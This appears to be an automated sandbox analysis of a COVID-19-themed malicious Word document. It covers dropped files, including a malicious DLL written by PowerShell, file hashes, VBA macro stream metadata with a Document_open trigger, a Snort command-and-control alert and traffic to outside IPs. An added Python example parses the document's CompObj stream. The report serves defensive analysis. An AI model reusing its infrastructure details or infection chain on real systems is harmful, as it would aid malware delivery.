                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\XP-9743 Medical report COVID-19.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 13 03:30:33 2021, length=161792, window=hide
                      Category:dropped
                      Size (bytes):2238
                      Entropy (8bit):4.553735922091283
                      Encrypted:false
                      SSDEEP:48:8T/XT3In3e/7J0e/kfQh2T/XT3In3e/7J0e/kfQ/:8T/XLIn3eOe8fQh2T/XLIn3eOe8fQ/
                      MD5:A1640691CEEC8E432223B5D9BF210FA0
                      SHA1:9774A9DCEEEDA35DEE3885096DEB30165BFAE407
                      SHA-256:A7025C15BBD7A8393D83B6C7AADDC266A589383C76A6C9A3F4095F28FF89213E
                      SHA-512:24EAB918AA1E67DD52173FE047EDCC327C138B8C9A07352C28691C20470E743B6EDA22EFE48AEAA7A50001355E99407C2E6BB7AFACE29C8B7EC1644EB5E5E5DB
                      Malicious:false
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):131
                      Entropy (8bit):5.033583001902089
                      Encrypted:false
                      SSDEEP:3:M1X4WztELQSjmIfFu4olfiWztELQSjmIfFu4omX1X4WztELQSjmIfFu4ov:MDELyIfjufrELyIfjNELyIfjy
                      MD5:704CBC7C6FF8908BC5C52CE42F4761B5
                      SHA1:5D1240BCC4954C9A5BBE7F8E5DFF3395536CE3BB
                      SHA-256:53B0E81D3E027793CE23B9E4393A9FDDBCC24D1FFEE1ECC4661FD6C0079EAA25
                      SHA-512:1720DCF3868389BC3C9280DFA018385A4AE383B1A84680BBA3B4BFC70AEFBDA6EA3C8A5F04DA75144B47EDFFA0913180C032488018F9A4915B04D159528D1974
                      Malicious:false
                      Preview: [doc]..XP-9743 Medical report COVID-19.LNK=0..XP-9743 Medical report COVID-19.LNK=0..[doc]..XP-9743 Medical report COVID-19.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFVIB84821J1PYPBOEY5.temp
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):8016
                      Entropy (8bit):3.586617243298514
                      Encrypted:false
                      SSDEEP:96:chQCsMqftMqvsqvJCwolz8hQCsMqftMqvsEHyqvJCwor/z1PYftJHyf8Iht+lUVJ:cy3olz8y7Hnor/z1bf8IBIu
                      MD5:5CC20A1959F6110E368E14FCE4C71E93
                      SHA1:17DCB465855248585EDE81A4B56D045B043B1BE7
                      SHA-256:8E444E6BEFE6AFC6A1041D54AC7D9290E2595EF93BAD5E4D820949E1841117E1
                      SHA-512:A415E620A9357D9F6D239887EACB0CAD8E5907F8CE29247D098526362650E80D7F18B0D5FE6D13351E563CD2F5EAEFC8F70CD26AE915EC7C8CDABCCBE2409BC5
                      Malicious:false
                      C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):340824
                      Entropy (8bit):4.347471014428068
                      Encrypted:false
                      SSDEEP:3072:aG9ctfNneahaNfjraHoEkApi23X5TKavlyw8W8:aG+Fe17mHoU/3NywH8
                      MD5:A675444E1D39C57D28ACE66CCDF56209
                      SHA1:B40E2B76AFE537083B4F024594A262238B7733CC
                      SHA-256:EC2A858FF4D3505EADEEB514A91ED38D34D80A81723DD48F8049A1E963C3587C
                      SHA-512:8CC242A9310AB3F25EB46453FAD48475ED2AA0E7EC0AD141C01339335B8905DF1578F14EBEB318EDF90014ECA794438C8CF1F2704549943056C00E6D587BD502
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%

                      Static File Info

                      General

                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic, Author: Ambre Vidal, Template: Normal.dotm, Last Saved By: Ethan Vasseur, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 17:56:00 2021, Last Saved Time/Date: Tue Jan 12 17:57:00 2021, Number of Pages: 1, Number of Words: 2466, Number of Characters: 14061, Security: 8
                      Entropy (8bit):6.693119364534795
                      TrID:
                      • Microsoft Word document (32009/1) 79.99%
                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                      File name:XP-9743 Medical report COVID-19.doc
                      File size:160861
                      MD5:da92c55d4b08367fb79a6bc6ae4da985
                      SHA1:8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
                      SHA256:137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61
                      SHA512:9ef0222dd48f94d149e090f17ab465389d489eefd5b4cad14867aa1bb5bbd4ca4af1a0d88ab62d74a90c3dbdb906cabdd823cd8105516a9b19fe642005f17e92
                      SSDEEP:3072:EX9ufstRUUKSns8T00JSHUgteMJ8qMD7g8NtP:69ufsfgIf0pL8PP

                      File Icon

                      Icon Hash:e4eea2aaa4b4b4a4

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "XP-9743 Medical report COVID-19.doc"

                      Indicators

                      Has Summary Info:True
                      Application Name:Microsoft Office Word
                      Encrypted Document:False
                      Contains Word Document Stream:True
                      Contains Workbook/Book Stream:False
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Code Page:1252
                      Title:
                      Subject:Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic
                      Author:Ambre Vidal
                      Keywords:
                      Comments:
                      Template:Normal.dotm
                      Last Saved By:Ethan Vasseur
                      Revision Number:1
                      Total Edit Time:0
                      Create Time:2021-01-12 17:56:00
                      Last Saved Time:2021-01-12 17:57:00
                      Number of Pages:1
                      Number of Words:2466
                      Number of Characters:14061
                      Creating Application:Microsoft Office Word
                      Security:8

                      Document Summary

                      Document Code Page:-535
                      Number of Lines:117
                      Number of Paragraphs:32
                      Thumbnail Scaling Desired:False
                      Company:
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:917504

                      Streams with VBA

                      VBA File Name: Gx8fznt8p0b, Stream Size: 10973
                      General
                      Stream Path:Macros/VBA/Gx8fznt8p0b
                      VBA File Name:Gx8fznt8p0b
                      Stream Size:10973

                      VBA Code Keywords

                      Keyword
                      VBA Code
                      VBA File Name: Kyl0l3rqw280c6ssa, Stream Size: 1118
                      General
                      Stream Path:Macros/VBA/Kyl0l3rqw280c6ssa
                      VBA File Name:Kyl0l3rqw280c6ssa
                      Stream Size:1118

                      VBA Code Keywords

                      Keyword
                      Document_open()
                      VB_Creatable
                      False
                      Private
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code
                      VBA File Name: P0_myy5fnenf, Stream Size: 699
                      General
                      Stream Path:Macros/VBA/P0_myy5fnenf
                      VBA File Name:P0_myy5fnenf
                      Stream Size:699

                      VBA Code Keywords

                      Keyword
                      Attribute
                      VB_Name
                      VBA Code

                      Streams

                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                      General
                      Stream Path:\x1CompObj
                      File Type:data
                      Stream Size:146
                      Entropy:4.00187355764
                      Base64 Encoded:False
                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      File Type:data
                      Stream Size:4096
                      Entropy:0.280929556603
                      Base64 Encoded:False
                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                      General
                      Stream Path:\x5SummaryInformation
                      File Type:data
                      Stream Size:544
                      Entropy:4.17934415163
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                      Stream Path: 1Table, File Type: data, Stream Size: 6424
                      General
                      Stream Path:1Table
                      File Type:data
                      Stream Size:6424
                      Entropy:6.13683822603
                      Base64 Encoded:True
                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                      Stream Path: Data, File Type: data, Stream Size: 99188
                      General
                      Stream Path:Data
                      File Type:data
                      Stream Size:99188
                      Entropy:7.39015578121
                      Base64 Encoded:True
                      Data ASCII:t . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . 7 . . " . . . . . . e i U . . . . . . . . . . . D . . . . . _ . . F . . . . . . . . 7 . . " . . . . . . e i U . . . . . . .
                      Data Raw:74 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 502
                      General
                      Stream Path:Macros/PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:502
                      Entropy:5.4581902648
                      Base64 Encoded:True
                      Data ASCII:I D = " { 7 B C 8 9 A B C - 1 9 3 3 - 4 F 3 3 - A 1 B A - 8 1 7 6 5 C 7 3 8 7 1 6 } " . . D o c u m e n t = K y l 0 l 3 r q w 2 8 0 c 6 s s a / & H 0 0 0 0 0 0 0 0 . . M o d u l e = P 0 _ m y y 5 f n e n f . . M o d u l e = G x 8 f z n t 8 p 0 b . . E x e N a m e 3 2 = " W h k r t 3 k 9 v w q q " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 0 A A 8 0 E A 8 0 E A 8 0 E A 8 0 E " . . D P B = " 3 D 3 F E F 7
                      Data Raw:49 44 3d 22 7b 37 42 43 38 39 41 42 43 2d 31 39 33 33 2d 34 46 33 33 2d 41 31 42 41 2d 38 31 37 36 35 43 37 33 38 37 31 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 50 30 5f 6d 79 79 35 66 6e 65 6e 66 0d 0a 4d 6f 64 75 6c 65 3d 47 78 38 66 7a 6e 74 38 70 30 62 0d 0a 45 78 65
                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131
                      General
                      Stream Path:Macros/PROJECTwm
                      File Type:data
                      Stream Size:131
                      Entropy:3.74080626522
                      Base64 Encoded:False
                      Data ASCII:K y l 0 l 3 r q w 2 8 0 c 6 s s a . K . y . l . 0 . l . 3 . r . q . w . 2 . 8 . 0 . c . 6 . s . s . a . . . P 0 _ m y y 5 f n e n f . P . 0 . _ . m . y . y . 5 . f . n . e . n . f . . . G x 8 f z n t 8 p 0 b . G . x . 8 . f . z . n . t . 8 . p . 0 . b . . . . .
                      Data Raw:4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 00 4b 00 79 00 6c 00 30 00 6c 00 33 00 72 00 71 00 77 00 32 00 38 00 30 00 63 00 36 00 73 00 73 00 61 00 00 00 50 30 5f 6d 79 79 35 66 6e 65 6e 66 00 50 00 30 00 5f 00 6d 00 79 00 79 00 35 00 66 00 6e 00 65 00 6e 00 66 00 00 00 47 78 38 66 7a 6e 74 38 70 30 62 00 47 00 78 00 38 00 66 00 7a 00 6e 00 74 00 38 00 70 00 30 00 62 00 00
                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4495
                      General
                      Stream Path:Macros/VBA/_VBA_PROJECT
                      File Type:data
                      Stream Size:4495
                      Entropy:5.32797660773
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 661
                      General
                      Stream Path:Macros/VBA/dir
                      File Type:data
                      Stream Size:661
                      Entropy:6.37896546622
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                      Data Raw:01 91 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 16 c1 ed 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                      Stream Path: WordDocument, File Type: data, Stream Size: 20014
                      General
                      Stream Path:WordDocument
                      File Type:data
                      Stream Size:20014
                      Entropy:4.1368278567
                      Base64 Encoded:False
                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . H . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . b . . . b . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8f 48 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 4e 00 00 62 7f 00 00 62 7f 00 00 8f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
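
The \x1CompObj stream listed above is where Word records which application owns the document: a CLSID, an ANSI clipboard-format name, a ProgID and, after the 0x71B239F4 marker, a Unicode "user type" string. On this page that string is rendered in the Data ASCII column as `. : . C . < . 5 . = . B`, which are the low bytes of UTF-16 Cyrillic code points. The Python below is an added example, not code from the report or from Joe Sandbox; it parses the 128-byte Data Raw prefix quoted on the page according to the MS-OLEDS CompObjStream layout, and it handles the fact that the page shows only a prefix of the 146-byte stream (the Unicode string is cut short and the remaining fields are absent). The field names follow the specification; the comments mark which readings are specific to this sample.

```python
"""Parse an OLE document's CompObj stream (name \\x01CompObj). Added example; not from the report."""
import struct
import uuid

# The 128-byte "Data Raw" prefix of the \x01CompObj stream as printed on the page.
# The stream is 146 bytes long, so the tail is missing and the parser must cope.
COMPOBJ_PREFIX = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 "
    "00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 "
    "6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 "
    "35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 "
    "57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00"
)

UNICODE_MARKER = 0x71B239F4  # MS-OLEDS: precedes the Unicode user-type string


class Truncated(Exception):
    """Raised when a field runs past the end of the available bytes."""


def _u32(data: bytes, off: int):
    if off + 4 > len(data):
        raise Truncated
    return struct.unpack_from("<I", data, off)[0], off + 4


def _ansi(data: bytes, off: int):
    """LengthPrefixedAnsiString: u32 byte count (NUL included) followed by the bytes."""
    n, off = _u32(data, off)
    if off + n > len(data):
        raise Truncated
    return data[off:off + n].rstrip(b"\0").decode("latin-1"), off + n


def _clipboard_format(data: bytes, off: int):
    """ClipboardFormatOrAnsiString: 0 means absent, 0xFFFFFFFF/0xFFFFFFFE means a
    u32 standard clipboard-format id follows, anything else is an ANSI name of that length."""
    n, off = _u32(data, off)
    if n == 0:
        return None, off
    if n in (0xFFFFFFFF, 0xFFFFFFFE):
        return _u32(data, off)
    if off + n > len(data):
        raise Truncated
    return data[off:off + n].rstrip(b"\0").decode("latin-1"), off + n


def parse_compobj(data: bytes) -> dict:
    """Return the CompObj fields found in `data`; 'truncated' is True when the
    bytes ran out before the stream was fully parsed."""
    info = {"truncated": False}
    try:
        if len(data) < 28:
            raise Truncated
        reserved1, version = struct.unpack_from("<II", data, 0)
        if reserved1 != 0xFFFE0001:  # fixed header value per MS-OLEDS
            raise ValueError("not a CompObj stream")
        info["version"] = hex(version)  # 0xa03 expected
        # The 20 reserved header bytes carry 0xFFFFFFFF and then the server CLSID
        # in this sample (Word.Document.8 = {00020906-0000-0000-C000-000000000046}).
        info["clsid"] = str(uuid.UUID(bytes_le=data[12:28])).upper()
        off = 28
        info["ansi_user_type"], off = _ansi(data, off)            # empty in this sample
        info["ansi_clipboard_format"], off = _clipboard_format(data, off)  # "MSWordDoc"
        # The spec names this field Reserved1; in this sample it carries the ProgID.
        info["prog_id"], off = _ansi(data, off)
        marker, off = _u32(data, off)
        if marker == UNICODE_MARKER:
            n, off = _u32(data, off)            # character count, NUL included
            chunk = data[off:off + 2 * n]
            info["unicode_user_type"] = chunk.decode("utf-16le", errors="ignore").rstrip("\0")
            if len(chunk) < 2 * n:
                raise Truncated                 # the page's prefix stops mid-string
    except Truncated:
        info["truncated"] = True
    return info


if __name__ == "__main__":
    for key, value in parse_compobj(COMPOBJ_PREFIX).items():
        print(f"{key:24} {value!r}")
```

Run against the page's bytes this reports CLSID 00020906-0000-0000-C000-000000000046, clipboard format MSWordDoc, ProgID Word.Document.8 and a Unicode user type that begins "Документ Microsoft Word 97-" (Russian for "Document"; the rest of the string lies beyond the quoted prefix), which is the kind of locale hint worth recording alongside the hashes at the top of the report.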

                      Network Behavior

                      Snort IDS Alerts

                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      01/12/21-20:31:20.789009 | TCP | 2404340 | ET CNC Feodo Tracker Reported CnC Server TCP group 21 | 49168 | 80 | 192.168.2.22 | 71.72.196.159

                      Network Port Distribution

                      TCP Packets

                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jan 12, 2021 20:31:04.502388954 CET | 49165 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.613992929 CET | 443 | 49165 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.614180088 CET | 49165 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.629313946 CET | 49165 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.740904093 CET | 443 | 49165 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.740953922 CET | 443 | 49165 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.740977049 CET | 443 | 49165 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.741005898 CET | 443 | 49165 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.741178036 CET | 49165 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.741214037 CET | 49165 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.754389048 CET | 49165 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.755346060 CET | 49166 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.865854979 CET | 443 | 49165 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.866605043 CET | 443 | 49166 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.866749048 CET | 49166 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.867340088 CET | 49166 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.978590965 CET | 443 | 49166 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.978642941 CET | 443 | 49166 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.978676081 CET | 443 | 49166 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.978705883 CET | 443 | 49166 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:04.978878021 CET | 49166 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:04.980880976 CET | 49166 | 443 | 192.168.2.22 | 5.2.81.171
                      Jan 12, 2021 20:31:05.067197084 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.092096090 CET | 443 | 49166 | 5.2.81.171 | 192.168.2.22
                      Jan 12, 2021 20:31:05.139599085 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.139782906 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.140002012 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.212311983 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219491005 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219544888 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219584942 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219623089 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219634056 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.219661951 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219698906 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219708920 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.219739914 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219772100 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.219779015 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219829082 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.219846010 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.219876051 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
